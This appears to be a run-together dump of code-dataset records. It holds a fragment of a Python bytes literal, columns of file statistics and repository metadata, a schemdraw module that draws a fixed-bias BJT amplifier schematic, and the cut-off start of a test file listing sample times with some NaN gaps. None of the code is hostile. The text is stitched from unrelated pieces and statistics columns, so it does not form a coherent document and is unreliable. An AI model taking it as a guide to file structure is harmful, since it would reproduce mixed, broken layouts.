         b"\xaa\x70\x3b\xf7\x8e\xc5\x43\x82\x1f\x0d\x55\x39\xb9\xfb\x46\xf5\xcc\xdd\x45\xb5\x08\x34\x38\xdb\x87\x8e\x3e\xda\x33\x75\x94\x9e" + \
         b"\x30\xde\x00\x47\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x81\x81\x00\xbb\x77\x85\xb5" + \
         b"\x4f\x1c\x4b\x39\x27\x15\x10\x5e\x41\x02\x91\xae\xcb\x97\x1a\xf0\xe8\xae\xf7\xd7\x01\x46\x84\x82\x04\x97\x3f\x77\x90\xf5\x90\xe8" + \
         b"\x08\xd0\xc6\xa7\x65\xeb\xc2\xca\xdf\x93\xf0\xd9\xcd\xed\xf4\x1f\xe3\x10\x1d\xc5\x20\x6a\xd7\xc1\xd0\x27\x29\xfc\x3f\x7c\x98\x1d" + \
         b"\xf6\x2c\x3d\xca\xb1\xc5\xb1\x3d\x4b\x74\xc6\xdc\xac\xda\xa3\xd3\xe0\x2e\xaf\xb0\x0e\x57\x24\x1b\xb1\x90\x5e\xee\xba\x8c\x2d\xd9" + \
         b"\x02\x1b\x93\x09\xe1\x60\xc3\x0c\xf0\x7a\x85\xed\x1c\x2d\x95\xe8\x13\x66\x33\xbd\x61\x25\x60\xe3\x64\x66\x42\x61"]
| 140.2
| 149
| 0.65781
| 1,252
| 5,608
| 2.944888
| 0.198882
| 0.014646
| 0.012205
| 0.016273
| 0.458096
| 0.458096
| 0.458096
| 0.441009
| 0.402766
| 0.38812
| 0
| 0.322249
| 0.099144
| 5,608
| 39
| 150
| 143.794872
| 0.407561
| 0
| 0
| 0
| 0
| 0.974359
| 0.861626
| 0.8602
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61724e9422d1cdd9f9679bdc95f08e985c05223c
| 2,430
|
py
|
Python
|
pyelectric/electronic/amplifier/fixed_polarization_tbj/drawing.py
|
luanws/pyelectric
|
047f7abb06baeda6ae97ba3b4c0e4f08e3e61dc6
|
[
"Apache-2.0"
] | null | null | null |
pyelectric/electronic/amplifier/fixed_polarization_tbj/drawing.py
|
luanws/pyelectric
|
047f7abb06baeda6ae97ba3b4c0e4f08e3e61dc6
|
[
"Apache-2.0"
] | null | null | null |
pyelectric/electronic/amplifier/fixed_polarization_tbj/drawing.py
|
luanws/pyelectric
|
047f7abb06baeda6ae97ba3b4c0e4f08e3e61dc6
|
[
"Apache-2.0"
] | null | null | null |
from schemdraw import Drawing
from schemdraw import elements as elm
from .input import Input
def draw_void():
drawing = Drawing()
transistor = drawing.add(elm.transistors.BjtNpn().right())
drawing.push()
drawing += elm.Resistor().up().label('Rc')
drawing += elm.Line().left().length(drawing.unit/2)
drawing.push()
drawing += elm.Dot()
drawing += elm.SourceV().up().reverse().label('Vcc')
drawing += elm.Ground().left()
drawing.pop()
drawing += elm.Line().left().length(drawing.unit/2)
drawing += elm.Resistor().down().label('Rb')
drawing += elm.Line().down().length(0.24*drawing.unit)
drawing += elm.Dot()
drawing.push()
drawing += elm.Line().to(transistor.base)
drawing.pop()
drawing += elm.Line().left().length(drawing.unit/4)
drawing += elm.Capacitor().left().reverse().label('Ci')
drawing += elm.Line().left().length(drawing.unit/4)
drawing += elm.Dot().label('Vi')
drawing += elm.Line().at(transistor.emitter).down().length(3*drawing.unit/4)
drawing += elm.Ground()
drawing.pop()
drawing += elm.Dot()
drawing += elm.Capacitor().right().label('Co')
drawing += elm.Dot().label('Vo')
return drawing
def draw(amplifier_input: Input):
    """Draw the fixed-polarization BJT amplifier schematic.

    The collector resistor, supply source and base resistor are labelled
    with ``str()`` of the ``Rc``, ``Vcc`` and ``Rb`` attributes of
    *amplifier_input*; the coupling capacitors keep the symbolic labels
    'Ci' and 'Co'.

    Returns:
        The assembled schemdraw Drawing (not yet rendered).
    """
    d = Drawing()
    bjt = d.add(elm.transistors.BjtNpn().right())
    d.push()
    # Collector branch: Rc up to the Vcc supply rail.
    d.add(elm.Resistor().up().label(str(amplifier_input.Rc)))
    d.add(elm.Line().left().length(d.unit / 2))
    d.push()
    d.add(elm.Dot())
    d.add(elm.SourceV().up().reverse().label(str(amplifier_input.Vcc)))
    d.add(elm.Ground().left())
    d.pop()
    # Base branch: Rb down toward the input coupling capacitor.
    d.add(elm.Line().left().length(d.unit / 2))
    d.add(elm.Resistor().down().label(str(amplifier_input.Rb)))
    d.add(elm.Line().down().length(0.24 * d.unit))
    d.add(elm.Dot())
    d.push()
    d.add(elm.Line().to(bjt.base))
    d.pop()
    # Input side: coupling capacitor Ci and the Vi terminal.
    d.add(elm.Line().left().length(d.unit / 4))
    d.add(elm.Capacitor().left().reverse().label('Ci'))
    d.add(elm.Line().left().length(d.unit / 4))
    d.add(elm.Dot().label('Vi'))
    # Emitter straight down to ground.
    d.add(elm.Line().at(bjt.emitter).down().length(3 * d.unit / 4))
    d.add(elm.Ground())
    d.pop()
    # Output side: coupling capacitor Co off the collector node to Vo.
    d.add(elm.Dot())
    d.add(elm.Capacitor().right().label('Co'))
    d.add(elm.Dot().label('Vo'))
    return d
| 28.588235
| 80
| 0.626749
| 311
| 2,430
| 4.881029
| 0.160772
| 0.250329
| 0.129117
| 0.094862
| 0.890646
| 0.890646
| 0.890646
| 0.890646
| 0.890646
| 0.890646
| 0
| 0.008902
| 0.167901
| 2,430
| 84
| 81
| 28.928571
| 0.74184
| 0
| 0
| 0.819672
| 0
| 0
| 0.009465
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032787
| false
| 0
| 0.04918
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
61a46475e2b713c9cfcafba8872b3e6e37fa7059
| 160,881
|
py
|
Python
|
pytest_t31.py
|
YuMiao329/ecg-analysis
|
b37d4a0a367bb2c933bb2ac46bde5a363a9b010a
|
[
"MIT"
] | null | null | null |
pytest_t31.py
|
YuMiao329/ecg-analysis
|
b37d4a0a367bb2c933bb2ac46bde5a363a9b010a
|
[
"MIT"
] | null | null | null |
pytest_t31.py
|
YuMiao329/ecg-analysis
|
b37d4a0a367bb2c933bb2ac46bde5a363a9b010a
|
[
"MIT"
] | null | null | null |
new_time = [0.0, 0.001, 0.003, 0.004, 0.006, 0.007, 0.008, 0.01, 0.011, 0.013, 0.014, 0.015, 0.017, 0.018, 0.019, 0.021, 0.022, 0.024, 0.025, 0.026, 0.028, 0.029, 0.031, 0.032, 0.033, 0.035, 0.036, 0.037, float("nan"), 0.04, 0.042, 0.043, 0.044, 0.046, 0.047, 0.049, 0.05, 0.051, float("nan"), 0.054, 0.056, 0.057, 0.058, 0.06, 0.061, 0.062, 0.064, 0.065, 0.067, 0.068, 0.069, 0.071, 0.072, 0.074, 0.075, 0.076, 0.078, float("nan"), 0.081, 0.082, 0.083, 0.085, 0.086, 0.087, 0.089, 0.09, 0.092, 0.093, 0.094, 0.096, 0.097, 0.099, 0.1, 0.101, 0.103, 0.104, 0.106, 0.107, 0.108, 0.11, 0.111, 0.113, 0.114, 0.115, 0.117, 0.118, 0.119, 0.121, 0.122, 0.124, 0.125, 0.126, 0.128, 0.129, 0.131, 0.132, 0.133, 0.135, 0.136, float("nan"), 0.139, 0.14, 0.142, 0.143, 0.144, 0.146, 0.147, 0.149, 0.15, 0.151, 0.153, 0.154, 0.156, 0.157, 0.158, 0.16, 0.161, 0.163, 0.164, 0.165, 0.167, 0.168, 0.169, 0.171, 0.172, 0.174, 0.175, 0.176, 0.178, 0.179, 0.181, 0.182, 0.183, 0.185, 0.186, 0.188, 0.189, 0.19, 0.192, 0.193, 0.194, 0.196, 0.197, 0.199, 0.2, 0.201, 0.203, 0.204, 0.206, 0.207, 0.208, 0.21, 0.211, 0.212, 0.214, 0.215, 0.217, 0.218, 0.219, 0.221, 0.222, 0.224, 0.225, 0.226, 0.228, 0.229, 0.231, 0.232, 0.233, 0.235, 0.236, 0.237, 0.239, 0.24, 0.242, 0.243, 0.244, 0.246, 0.247, 0.249, 0.25, 0.251, 0.253, 0.254, 0.256, 0.257, 0.258, 0.26, 0.261, 0.263, 0.264, 0.265, 0.267, 0.268, 0.269, 0.271, 0.272, 0.274, 0.275, 0.276, 0.278, 0.279, 0.281, 0.282, 0.283, 0.285, 0.286, 0.287, 0.289, 0.29, 0.292, 0.293, 0.294, 0.296, 0.297, 0.299, 0.3, 0.301, 0.303, 0.304, 0.306, 0.307, 0.308, 0.31, 0.311, 0.312, 0.314, 0.315, 0.317, 0.318, 0.319, 0.321, 0.322, 0.324, 0.325, 0.326, 0.328, 0.329, 0.331, 0.332, 0.333, 0.335, 0.336, 0.338, 0.339, 0.34, 0.342, 0.343, 0.344, 0.346, 0.347, 0.349, 0.35, 0.351, 0.353, 0.354, 0.356, 0.357, 0.358, 0.36, 0.361, 0.362, 0.364, 0.365, 0.367, 0.368, 0.369, 0.371, 0.372, 0.374, 0.375, 0.376, 0.378, 0.379, 0.381, 0.382, 0.383, 0.385, 0.386, 0.388, 0.389, 0.39, 0.392, 0.393, 
0.394, 0.396, 0.397, 0.399, 0.4, 0.401, 0.403, 0.404, 0.406, 0.407, 0.408, 0.41, 0.411, 0.412, 0.414, 0.415, 0.417, 0.418, 0.419, 0.421, 0.422, 0.424, 0.425, 0.426, 0.428, 0.429, 0.431, 0.432, 0.433, 0.435, 0.436, 0.438, 0.439, 0.44, 0.442, 0.443, 0.444, 0.446, 0.447, 0.449, 0.45, 0.451, 0.453, 0.454, 0.456, 0.457, 0.458, 0.46, 0.461, 0.463, 0.464, 0.465, 0.467, 0.468, 0.469, 0.471, 0.472, 0.474, 0.475, 0.476, 0.478, 0.479, 0.481, 0.482, 0.483, 0.485, 0.486, 0.487, 0.489, 0.49, 0.492, 0.493, 0.494, 0.496, 0.497, 0.499, 0.5, 0.501, 0.503, 0.504, 0.506, 0.507, 0.508, 0.51, 0.511, 0.512, 0.514, 0.515, 0.517, 0.518, 0.519, 0.521, 0.522, 0.524, 0.525, 0.526, 0.528, 0.529, 0.531, 0.532, 0.533, 0.535, 0.536, 0.537, 0.539, 0.54, 0.542, 0.543, 0.544, 0.546, 0.547, 0.549, 0.55, 0.551, 0.553, 0.554, 0.556, 0.557, 0.558, 0.56, 0.561, 0.562, 0.564, 0.565, 0.567, 0.568, 0.569, 0.571, 0.572, 0.574, 0.575, 0.576, 0.578, 0.579, 0.581, 0.582, 0.583, 0.585, 0.586, 0.588, 0.589, 0.59, 0.592, 0.593, 0.594, 0.596, 0.597, 0.599, 0.6, 0.601, 0.603, 0.604, 0.606, 0.607, 0.608, 0.61, 0.611, 0.613, 0.614, 0.615, 0.617, 0.618, 0.619, 0.621, 0.622, 0.624, 0.625, 0.626, 0.628, 0.629, 0.631, 0.632, 0.633, 0.635, 0.636, 0.637, 0.639, 0.64, 0.642, 0.643, 0.644, 0.646, 0.647, 0.649, 0.65, 0.651, 0.653, 0.654, 0.656, 0.657, 0.658, 0.66, 0.661, 0.662, 0.664, 0.665, 0.667, 0.668, 0.669, 0.671, 0.672, 0.674, 0.675, 0.676, 0.678, 0.679, 0.681, 0.682, 0.683, 0.685, 0.686, 0.688, 0.689, 0.69, 0.692, 0.693, 0.694, 0.696, 0.697, 0.699, 0.7, 0.701, 0.703, 0.704, 0.706, 0.707, 0.708, 0.71, 0.711, 0.713, 0.714, 0.715, 0.717, 0.718, 0.719, 0.721, 0.722, 0.724, 0.725, 0.726, 0.728, 0.729, 0.731, 0.732, 0.733, 0.735, 0.736, 0.738, 0.739, 0.74, 0.742, 0.743, 0.744, 0.746, 0.747, 0.749, 0.75, 0.751, 0.753, 0.754, 0.756, 0.757, 0.758, 0.76, 0.761, 0.762, 0.764, 0.765, 0.767, 0.768, 0.769, 0.771, 0.772, 0.774, 0.775, 0.776, 0.778, 0.779, 0.781, 0.782, 0.783, 0.785, 0.786, 0.787, 0.789, 0.79, 0.792, 0.793, 0.794, 
0.796, 0.797, 0.799, 0.8, 0.801, 0.803, 0.804, 0.806, 0.807, 0.808, 0.81, 0.811, 0.812, 0.814, 0.815, 0.817, 0.818, 0.819, 0.821, 0.822, 0.824, 0.825, 0.826, 0.828, 0.829, 0.831, 0.832, 0.833, 0.835, 0.836, 0.838, 0.839, 0.84, 0.842, 0.843, 0.844, 0.846, 0.847, 0.849, 0.85, 0.851, 0.853, 0.854, 0.856, 0.857, 0.858, 0.86, 0.861, 0.863, 0.864, 0.865, 0.867, 0.868, 0.869, 0.871, 0.872, 0.874, 0.875, 0.876, 0.878, 0.879, 0.881, 0.882, 0.883, 0.885, 0.886, 0.887, 0.889, 0.89, 0.892, 0.893, 0.894, 0.896, 0.897, 0.899, 0.9, 0.901, 0.903, 0.904, 0.906, 0.907, 0.908, 0.91, 0.911, 0.912, 0.914, 0.915, 0.917, 0.918, 0.919, 0.921, 0.922, 0.924, 0.925, 0.926, 0.928, 0.929, 0.931, 0.932, 0.933, 0.935, 0.936, 0.938, 0.939, 0.94, 0.942, 0.943, 0.944, 0.946, 0.947, 0.949, 0.95, 0.951, 0.953, 0.954, 0.956, 0.957, 0.958, 0.96, 0.961, 0.963, 0.964, 0.965, 0.967, 0.968, 0.969, 0.971, 0.972, 0.974, 0.975, 0.976, 0.978, 0.979, 0.981, 0.982, 0.983, 0.985, 0.986, 0.988, 0.989, 0.99, 0.992, 0.993, 0.994, 0.996, 0.997, 0.999, 1.0, 1.001, 1.003, 1.004, 1.006, 1.007, 1.008, 1.01, 1.011, 1.012, 1.014, 1.015, 1.017, 1.018, 1.019, 1.021, 1.022, 1.024, 1.025, 1.026, 1.028, 1.029, 1.031, 1.032, 1.033, 1.035, 1.036, 1.038, 1.039, 1.04, 1.042, 1.043, 1.044, 1.046, 1.047, 1.049, 1.05, 1.051, 1.053, 1.054, 1.056, 1.057, 1.058, 1.06, 1.061, 1.062, 1.064, 1.065, 1.067, 1.068, 1.069, 1.071, 1.072, 1.074, 1.075, 1.076, 1.078, 1.079, 1.081, 1.082, 1.083, 1.085, 1.086, 1.087, 1.089, 1.09, 1.092, 1.093, 1.094, 1.096, 1.097, 1.099, 1.1, 1.101, 1.103, 1.104, 1.106, 1.107, 1.108, 1.11, 1.111, 1.113, 1.114, 1.115, 1.117, 1.118, 1.119, 1.121, 1.122, 1.124, 1.125, 1.126, 1.128, 1.129, 1.131, 1.132, 1.133, 1.135, 1.136, 1.137, 1.139, 1.14, 1.142, 1.143, 1.144, 1.146, 1.147, 1.149, 1.15, 1.151, 1.153, 1.154, 1.156, 1.157, 1.158, 1.16, 1.161, 1.163, 1.164, 1.165, 1.167, 1.168, 1.169, 1.171, 1.172, 1.174, 1.175, 1.176, 1.178, 1.179, 1.181, 1.182, 1.183, 1.185, 1.186, 1.188, 1.189, 1.19, 1.192, 1.193, 1.194, 1.196, 
1.197, 1.199, 1.2, 1.201, 1.203, 1.204, 1.206, 1.207, 1.208, 1.21, 1.211, 1.212, 1.214, 1.215, 1.217, 1.218, 1.219, 1.221, 1.222, 1.224, 1.225, 1.226, 1.228, 1.229, 1.231, 1.232, 1.233, 1.235, 1.236, 1.238, 1.239, 1.24, 1.242, 1.243, 1.244, 1.246, 1.247, 1.249, 1.25, 1.251, 1.253, 1.254, 1.256, 1.257, 1.258, 1.26, 1.261, 1.262, 1.264, 1.265, 1.267, 1.268, 1.269, 1.271, 1.272, 1.274, 1.275, 1.276, 1.278, 1.279, 1.281, 1.282, 1.283, 1.285, 1.286, 1.288, 1.289, 1.29, 1.292, 1.293, 1.294, 1.296, 1.297, 1.299, 1.3, 1.301, 1.303, 1.304, 1.306, 1.307, 1.308, 1.31, 1.311, 1.312, 1.314, 1.315, 1.317, 1.318, 1.319, 1.321, 1.322, 1.324, 1.325, 1.326, 1.328, 1.329, 1.331, 1.332, 1.333, 1.335, 1.336, 1.337, 1.339, 1.34, 1.342, 1.343, 1.344, 1.346, 1.347, 1.349, 1.35, 1.351, 1.353, 1.354, 1.356, 1.357, 1.358, 1.36, 1.361, 1.363, 1.364, 1.365, 1.367, 1.368, 1.369, 1.371, 1.372, 1.374, 1.375, 1.376, 1.378, 1.379, 1.381, 1.382, 1.383, 1.385, 1.386, 1.387, 1.389, 1.39, 1.392, 1.393, 1.394, 1.396, 1.397, 1.399, 1.4, 1.401, 1.403, 1.404, 1.406, 1.407, 1.408, 1.41, 1.411, 1.413, 1.414, 1.415, 1.417, 1.418, 1.419, 1.421, 1.422, 1.424, 1.425, 1.426, 1.428, 1.429, 1.431, 1.432, 1.433, 1.435, 1.436, 1.438, 1.439, 1.44, 1.442, 1.443, 1.444, 1.446, 1.447, 1.449, 1.45, 1.451, 1.453, 1.454, 1.456, 1.457, 1.458, 1.46, 1.461, 1.462, 1.464, 1.465, 1.467, 1.468, 1.469, 1.471, 1.472, 1.474, 1.475, 1.476, 1.478, 1.479, 1.481, 1.482, 1.483, 1.485, 1.486, 1.488, 1.489, 1.49, 1.492, 1.493, 1.494, 1.496, 1.497, 1.499, 1.5, 1.501, 1.503, 1.504, 1.506, 1.507, 1.508, 1.51, 1.511, 1.512, 1.514, 1.515, 1.517, 1.518, 1.519, 1.521, 1.522, 1.524, 1.525, 1.526, 1.528, 1.529, 1.531, 1.532, 1.533, 1.535, 1.536, 1.538, 1.539, 1.54, 1.542, 1.543, 1.544, 1.546, 1.547, 1.549, 1.55, 1.551, 1.553, 1.554, 1.556, 1.557, 1.558, 1.56, 1.561, 1.562, 1.564, 1.565, 1.567, 1.568, 1.569, 1.571, 1.572, 1.574, 1.575, 1.576, 1.578, 1.579, 1.581, 1.582, 1.583, 1.585, 1.586, 1.587, 1.589, 1.59, 1.592, 1.593, 1.594, 1.596, 1.597, 
1.599, 1.6, 1.601, 1.603, 1.604, 1.606, 1.607, 1.608, 1.61, 1.611, 1.613, 1.614, 1.615, 1.617, 1.618, 1.619, 1.621, 1.622, 1.624, 1.625, 1.626, 1.628, 1.629, 1.631, 1.632, 1.633, 1.635, 1.636, 1.637, 1.639, 1.64, 1.642, 1.643, 1.644, 1.646, 1.647, 1.649, 1.65, 1.651, 1.653, 1.654, 1.656, 1.657, 1.658, 1.66, 1.661, 1.663, 1.664, 1.665, 1.667, 1.668, 1.669, 1.671, 1.672, 1.674, 1.675, 1.676, 1.678, 1.679, 1.681, 1.682, 1.683, 1.685, 1.686, 1.688, 1.689, 1.69, 1.692, 1.693, 1.694, 1.696, 1.697, 1.699, 1.7, 1.701, 1.703, 1.704, 1.706, 1.707, 1.708, 1.71, 1.711, 1.712, 1.714, 1.715, 1.717, 1.718, 1.719, 1.721, 1.722, 1.724, 1.725, 1.726, 1.728, 1.729, 1.731, 1.732, 1.733, 1.735, 1.736, 1.738, 1.739, 1.74, 1.742, 1.743, 1.744, 1.746, 1.747, 1.749, 1.75, 1.751, 1.753, 1.754, 1.756, 1.757, 1.758, 1.76, 1.761, 1.762, 1.764, 1.765, 1.767, 1.768, 1.769, 1.771, 1.772, 1.774, 1.775, 1.776, 1.778, 1.779, 1.781, 1.782, 1.783, 1.785, 1.786, 1.788, 1.789, 1.79, 1.792, 1.793, 1.794, 1.796, 1.797, 1.799, 1.8, 1.801, 1.803, 1.804, 1.806, 1.807, 1.808, 1.81, 1.811, 1.812, 1.814, 1.815, 1.817, 1.818, 1.819, 1.821, 1.822, 1.824, 1.825, 1.826, 1.828, 1.829, 1.831, 1.832, 1.833, 1.835, 1.836, 1.837, 1.839, 1.84, 1.842, 1.843, 1.844, 1.846, 1.847, 1.849, 1.85, 1.851, 1.853, 1.854, 1.856, 1.857, 1.858, 1.86, 1.861, 1.863, 1.864, 1.865, 1.867, 1.868, 1.869, 1.871, 1.872, 1.874, 1.875, 1.876, 1.878, 1.879, 1.881, 1.882, 1.883, 1.885, 1.886, 1.887, 1.889, 1.89, 1.892, 1.893, 1.894, 1.896, 1.897, 1.899, 1.9, 1.901, 1.903, 1.904, 1.906, 1.907, 1.908, 1.91, 1.911, 1.913, 1.914, 1.915, 1.917, 1.918, 1.919, 1.921, 1.922, 1.924, 1.925, 1.926, 1.928, 1.929, 1.931, 1.932, 1.933, 1.935, 1.936, 1.938, 1.939, 1.94, 1.942, 1.943, 1.944, 1.946, 1.947, 1.949, 1.95, 1.951, 1.953, 1.954, 1.956, 1.957, 1.958, 1.96, 1.961, 1.962, 1.964, 1.965, 1.967, 1.968, 1.969, 1.971, 1.972, 1.974, 1.975, 1.976, 1.978, 1.979, 1.981, 1.982, 1.983, 1.985, 1.986, 1.988, 1.989, 1.99, 1.992, 1.993, 1.994, 1.996, 1.997, 1.999, 2.0, 
2.001, 2.003, 2.004, 2.006, 2.007, 2.008, 2.01, 2.011, 2.013, 2.014, 2.015, 2.017, 2.018, 2.019, 2.021, 2.022, 2.024, 2.025, 2.026, 2.028, 2.029, 2.031, 2.032, 2.033, 2.035, 2.036, 2.038, 2.039, 2.04, 2.042, 2.043, 2.044, 2.046, 2.047, 2.049, 2.05, 2.051, 2.053, 2.054, 2.056, 2.057, 2.058, 2.06, 2.061, 2.062, 2.064, 2.065, 2.067, 2.068, 2.069, 2.071, 2.072, 2.074, 2.075, 2.076, 2.078, 2.079, 2.081, 2.082, 2.083, 2.085, 2.086, 2.087, 2.089, 2.09, 2.092, 2.093, 2.094, 2.096, 2.097, 2.099, 2.1, 2.101, 2.103, 2.104, 2.106, 2.107, 2.108, 2.11, 2.111, 2.112, 2.114, 2.115, 2.117, 2.118, 2.119, 2.121, 2.122, 2.124, 2.125, 2.126, 2.128, 2.129, 2.131, 2.132, 2.133, 2.135, 2.136, 2.138, 2.139, 2.14, 2.142, 2.143, 2.144, 2.146, 2.147, 2.149, 2.15, 2.151, 2.153, 2.154, 2.156, 2.157, 2.158, 2.16, 2.161, 2.163, 2.164, 2.165, 2.167, 2.168, 2.169, 2.171, 2.172, 2.174, 2.175, 2.176, 2.178, 2.179, 2.181, 2.182, 2.183, 2.185, 2.186, 2.188, 2.189, 2.19, 2.192, 2.193, 2.194, 2.196, 2.197, 2.199, 2.2, 2.201, 2.203, 2.204, 2.206, 2.207, 2.208, 2.21, 2.211, 2.212, 2.214, 2.215, 2.217, 2.218, 2.219, 2.221, 2.222, 2.224, 2.225, 2.226, 2.228, 2.229, 2.231, 2.232, 2.233, 2.235, 2.236, 2.237, 2.239, 2.24, 2.242, 2.243, 2.244, 2.246, 2.247, 2.249, 2.25, 2.251, 2.253, 2.254, 2.256, 2.257, 2.258, 2.26, 2.261, 2.263, 2.264, 2.265, 2.267, 2.268, 2.269, 2.271, 2.272, 2.274, 2.275, 2.276, 2.278, 2.279, 2.281, 2.282, 2.283, 2.285, 2.286, 2.288, 2.289, 2.29, 2.292, 2.293, 2.294, 2.296, 2.297, 2.299, 2.3, 2.301, 2.303, 2.304, 2.306, 2.307, 2.308, 2.31, 2.311, 2.312, 2.314, 2.315, 2.317, 2.318, 2.319, 2.321, 2.322, 2.324, 2.325, 2.326, 2.328, 2.329, 2.331, 2.332, 2.333, 2.335, 2.336, 2.337, 2.339, 2.34, 2.342, 2.343, 2.344, 2.346, 2.347, 2.349, 2.35, 2.351, 2.353, 2.354, 2.356, 2.357, 2.358, 2.36, 2.361, 2.362, 2.364, 2.365, 2.367, 2.368, 2.369, 2.371, 2.372, 2.374, 2.375, 2.376, 2.378, 2.379, 2.381, 2.382, 2.383, 2.385, 2.386, 2.388, 2.389, 2.39, 2.392, 2.393, 2.394, 2.396, 2.397, 2.399, 2.4, 2.401, 
2.403, 2.404, 2.406, 2.407, 2.408, 2.41, 2.411, 2.413, 2.414, 2.415, 2.417, 2.418, 2.419, 2.421, 2.422, 2.424, 2.425, 2.426, 2.428, 2.429, 2.431, 2.432, 2.433, 2.435, 2.436, 2.438, 2.439, 2.44, 2.442, 2.443, 2.444, 2.446, 2.447, 2.449, 2.45, 2.451, 2.453, 2.454, 2.456, 2.457, 2.458, 2.46, 2.461, 2.462, 2.464, 2.465, 2.467, 2.468, 2.469, 2.471, 2.472, 2.474, 2.475, 2.476, 2.478, 2.479, 2.481, 2.482, 2.483, 2.485, 2.486, 2.487, 2.489, 2.49, 2.492, 2.493, 2.494, 2.496, 2.497, 2.499, 2.5, 2.501, 2.503, 2.504, 2.506, 2.507, 2.508, 2.51, 2.511, 2.513, 2.514, 2.515, 2.517, 2.518, 2.519, 2.521, 2.522, 2.524, 2.525, 2.526, 2.528, 2.529, 2.531, 2.532, 2.533, 2.535, 2.536, 2.538, 2.539, 2.54, 2.542, 2.543, 2.544, 2.546, 2.547, 2.549, 2.55, 2.551, 2.553, 2.554, 2.556, 2.557, 2.558, 2.56, 2.561, 2.562, 2.564, 2.565, 2.567, 2.568, 2.569, 2.571, 2.572, 2.574, 2.575, 2.576, 2.578, 2.579, 2.581, 2.582, 2.583, 2.585, 2.586, 2.587, 2.589, 2.59, 2.592, 2.593, 2.594, 2.596, 2.597, 2.599, 2.6, 2.601, 2.603, 2.604, 2.606, 2.607, 2.608, 2.61, 2.611, 2.612, 2.614, 2.615, 2.617, 2.618, 2.619, 2.621, 2.622, 2.624, 2.625, 2.626, 2.628, 2.629, 2.631, 2.632, 2.633, 2.635, 2.636, 2.638, 2.639, 2.64, 2.642, 2.643, 2.644, 2.646, 2.647, 2.649, 2.65, 2.651, 2.653, 2.654, 2.656, 2.657, 2.658, 2.66, 2.661, 2.663, 2.664, 2.665, 2.667, 2.668, 2.669, 2.671, 2.672, 2.674, 2.675, 2.676, 2.678, 2.679, 2.681, 2.682, 2.683, 2.685, 2.686, 2.688, 2.689, 2.69, 2.692, 2.693, 2.694, 2.696, 2.697, 2.699, 2.7, 2.701, 2.703, 2.704, 2.706, 2.707, 2.708, 2.71, 2.711, 2.712, 2.714, 2.715, 2.717, 2.718, 2.719, 2.721, 2.722, 2.724, 2.725, 2.726, 2.728, 2.729, 2.731, 2.732, 2.733, 2.735, 2.736, 2.737, 2.739, 2.74, 2.742, 2.743, 2.744, 2.746, 2.747, 2.749, 2.75, 2.751, 2.753, 2.754, 2.756, 2.757, 2.758, 2.76, 2.761, 2.763, 2.764, 2.765, 2.767, 2.768, 2.769, 2.771, 2.772, 2.774, 2.775, 2.776, 2.778, 2.779, 2.781, 2.782, 2.783, 2.785, 2.786, 2.788, 2.789, 2.79, 2.792, 2.793, 2.794, 2.796, 2.797, 2.799, 2.8, 2.801, 2.803, 
2.804, 2.806, 2.807, 2.808, 2.81, 2.811, 2.812, 2.814, 2.815, 2.817, 2.818, 2.819, 2.821, 2.822, 2.824, 2.825, 2.826, 2.828, 2.829, 2.831, 2.832, 2.833, 2.835, 2.836, 2.837, 2.839, 2.84, 2.842, 2.843, 2.844, 2.846, 2.847, 2.849, 2.85, 2.851, 2.853, 2.854, 2.856, 2.857, 2.858, 2.86, 2.861, 2.862, 2.864, 2.865, 2.867, 2.868, 2.869, 2.871, 2.872, 2.874, 2.875, 2.876, 2.878, 2.879, 2.881, 2.882, 2.883, 2.885, 2.886, 2.888, 2.889, 2.89, 2.892, 2.893, 2.894, 2.896, 2.897, 2.899, 2.9, 2.901, 2.903, 2.904, 2.906, 2.907, 2.908, 2.91, 2.911, 2.913, 2.914, 2.915, 2.917, 2.918, 2.919, 2.921, 2.922, 2.924, 2.925, 2.926, 2.928, 2.929, 2.931, 2.932, 2.933, 2.935, 2.936, 2.938, 2.939, 2.94, 2.942, 2.943, 2.944, 2.946, 2.947, 2.949, 2.95, 2.951, 2.953, 2.954, 2.956, 2.957, 2.958, 2.96, 2.961, 2.962, 2.964, 2.965, 2.967, 2.968, 2.969, 2.971, 2.972, 2.974, 2.975, 2.976, 2.978, 2.979, 2.981, 2.982, 2.983, 2.985, 2.986, 2.987, 2.989, 2.99, 2.992, 2.993, 2.994, 2.996, 2.997, 2.999, 3.0, 3.001, 3.003, 3.004, 3.006, 3.007, 3.008, 3.01, 3.011, 3.013, 3.014, 3.015, 3.017, 3.018, 3.019, 3.021, 3.022, 3.024, 3.025, 3.026, 3.028, 3.029, 3.031, 3.032, 3.033, 3.035, 3.036, 3.038, 3.039, 3.04, 3.042, 3.043, 3.044, 3.046, 3.047, 3.049, 3.05, 3.051, 3.053, 3.054, 3.056, 3.057, 3.058, 3.06, 3.061, 3.062, 3.064, 3.065, 3.067, 3.068, 3.069, 3.071, 3.072, 3.074, 3.075, 3.076, 3.078, 3.079, 3.081, 3.082, 3.083, 3.085, 3.086, 3.087, 3.089, 3.09, 3.092, 3.093, 3.094, 3.096, 3.097, 3.099, 3.1, 3.101, 3.103, 3.104, 3.106, 3.107, 3.108, 3.11, 3.111, 3.112, 3.114, 3.115, 3.117, 3.118, 3.119, 3.121, 3.122, 3.124, 3.125, 3.126, 3.128, 3.129, 3.131, 3.132, 3.133, 3.135, 3.136, 3.138, 3.139, 3.14, 3.142, 3.143, 3.144, 3.146, 3.147, 3.149, 3.15, 3.151, 3.153, 3.154, 3.156, 3.157, 3.158, 3.16, 3.161, 3.163, 3.164, 3.165, 3.167, 3.168, 3.169, 3.171, 3.172, 3.174, 3.175, 3.176, 3.178, 3.179, 3.181, 3.182, 3.183, 3.185, 3.186, 3.188, 3.189, 3.19, 3.192, 3.193, 3.194, 3.196, 3.197, 